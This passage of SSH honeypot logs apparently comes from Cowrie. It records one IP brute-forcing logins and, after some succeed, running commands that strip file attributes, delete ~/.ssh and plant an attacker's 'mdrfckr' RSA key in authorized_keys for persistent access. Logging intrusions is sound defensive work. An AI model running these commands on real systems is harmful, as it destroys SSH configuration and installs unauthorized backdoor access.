AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T10:00:39.514935Z","src_ip":"212.227.235.229","session":"3cccdac9e705"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T10:00:39.780117Z","src_ip":"212.227.235.229","session":"3cccdac9e705"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:00:39.783247Z","src_ip":"212.227.235.229","session":"3cccdac9e705"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38564,"dst_ip":"1.2.3.4","dst_port":22,"session":"f512c6eaefc3","protocol":"ssh","message":"New connection: 212.227.235.229:38564 (1.2.3.4:22) [session: f512c6eaefc3]","sensor":"my-vps","timestamp":"2025-09-09T10:00:40.036601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:00:40.040343Z","src_ip":"212.227.235.229","session":"f512c6eaefc3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:00:40.305241Z","src_ip":"212.227.235.229","session":"f512c6eaefc3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T10:00:41.382216Z","src_ip":"212.227.235.229","session":"f512c6eaefc3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:00:42.647215Z","src_ip":"212.227.235.229","session":"f512c6eaefc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39592,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8c8732c686d","protocol":"ssh","message":"New connection: 212.227.235.229:39592 (1.2.3.4:22) [session: a8c8732c686d]","sensor":"my-vps","timestamp":"2025-09-09T10:00:42.903446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:00:42.907410Z","src_ip":"212.227.235.229","session":"a8c8732c686d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:00:43.162633Z","src_ip":"212.227.235.229","session":"a8c8732c686d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:00:44.347018Z","src_ip":"212.227.235.229","session":"a8c8732c686d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:00:44.615550Z","src_ip":"212.227.235.229","session":"a8c8732c686d"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:00:44.616812Z","src_ip":"212.227.235.229","session":"3cccdac9e705"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39228,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4ace2c695f5","protocol":"ssh","message":"New connection: 212.227.235.229:39228 (1.2.3.4:22) [session: f4ace2c695f5]","sensor":"my-vps","timestamp":"2025-09-09T10:00:55.968822Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:00:55.977915Z","src_ip":"212.227.235.229","session":"f4ace2c695f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:00:56.250723Z","src_ip":"212.227.235.229","session":"f4ace2c695f5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T10:00:57.363572Z","src_ip":"212.227.235.229","session":"f4ace2c695f5"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:00:58.641187Z","src_ip":"212.227.235.229","session":"f4ace2c695f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35526,"dst_ip":"1.2.3.4","dst_port":22,"session":"de2623f33fd8","protocol":"ssh","message":"New connection: 212.227.235.229:35526 (1.2.3.4:22) [session: de2623f33fd8]","sensor":"my-vps","timestamp":"2025-09-09T10:01:12.200710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:01:12.203567Z","src_ip":"212.227.235.229","session":"de2623f33fd8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:01:12.299677Z","src_ip":"212.227.235.229","session":"de2623f33fd8"}
{"eventid":"cowrie.login.failed","username":"slave","password":"password1","message":"login attempt [slave/password1] failed","sensor":"my-vps","timestamp":"2025-09-09T10:01:12.738615Z","src_ip":"212.227.235.229","session":"de2623f33fd8"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:01:13.838299Z","src_ip":"212.227.235.229","session":"de2623f33fd8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49464,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf4bb0af7aba","protocol":"ssh","message":"New connection: 212.227.235.229:49464 (1.2.3.4:22) [session: cf4bb0af7aba]","sensor":"my-vps","timestamp":"2025-09-09T10:01:32.429773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:01:32.434863Z","src_ip":"212.227.235.229","session":"cf4bb0af7aba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:01:32.695529Z","src_ip":"212.227.235.229","session":"cf4bb0af7aba"}
{"eventid":"cowrie.login.success","username":"root","password":"Py123456","message":"login attempt [root/Py123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:01:33.780644Z","src_ip":"212.227.235.229","session":"cf4bb0af7aba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:01:34.324141Z","src_ip":"212.227.235.229","session":"cf4bb0af7aba"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:01:34.325429Z","src_ip":"212.227.235.229","session":"cf4bb0af7aba"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:01:34.331083Z","src_ip":"212.227.235.229","session":"cf4bb0af7aba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:01:34.603360Z","src_ip":"212.227.235.229","session":"cf4bb0af7aba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:01:35.241416Z","src_ip":"212.227.235.229","session":"cf4bb0af7aba"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T10:01:35.243818Z","src_ip":"212.227.235.229","session":"cf4bb0af7aba"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T10:01:35.510637Z","src_ip":"212.227.235.229","session":"cf4bb0af7aba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:01:35.513956Z","src_ip":"212.227.235.229","session":"cf4bb0af7aba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49754,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb5556a2d025","protocol":"ssh","message":"New connection: 212.227.235.229:49754 (1.2.3.4:22) [session: cb5556a2d025]","sensor":"my-vps","timestamp":"2025-09-09T10:01:35.797140Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:01:35.801193Z","src_ip":"212.227.235.229","session":"cb5556a2d025"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:01:36.086788Z","src_ip":"212.227.235.229","session":"cb5556a2d025"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T10:01:37.194638Z","src_ip":"212.227.235.229","session":"cb5556a2d025"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49756,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a74cf86d7f5","protocol":"ssh","message":"New connection: 212.227.235.229:49756 (1.2.3.4:22) [session: 8a74cf86d7f5]","sensor":"my-vps","timestamp":"2025-09-09T10:01:38.781786Z"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:01:38.783678Z","src_ip":"212.227.235.229","session":"cb5556a2d025"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:01:38.785488Z","src_ip":"212.227.235.229","session":"8a74cf86d7f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:01:39.044978Z","src_ip":"212.227.235.229","session":"8a74cf86d7f5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:01:40.153707Z","src_ip":"212.227.235.229","session":"8a74cf86d7f5"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:01:40.418448Z","src_ip":"212.227.235.229","session":"cf4bb0af7aba"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:01:40.419611Z","src_ip":"212.227.235.229","session":"8a74cf86d7f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35808,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3277f5bb902","protocol":"ssh","message":"New connection: 212.227.235.229:35808 (1.2.3.4:22) [session: e3277f5bb902]","sensor":"my-vps","timestamp":"2025-09-09T10:01:57.494416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:01:57.501983Z","src_ip":"212.227.235.229","session":"e3277f5bb902"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:01:57.761894Z","src_ip":"212.227.235.229","session":"e3277f5bb902"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61476,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab32e62f40f8","protocol":"ssh","message":"New connection: 217.72.205.35:61476 (1.2.3.4:22) [session: ab32e62f40f8]","sensor":"my-vps","timestamp":"2025-09-09T10:01:58.266451Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:01:58.269645Z","src_ip":"217.72.205.35","session":"ab32e62f40f8"}
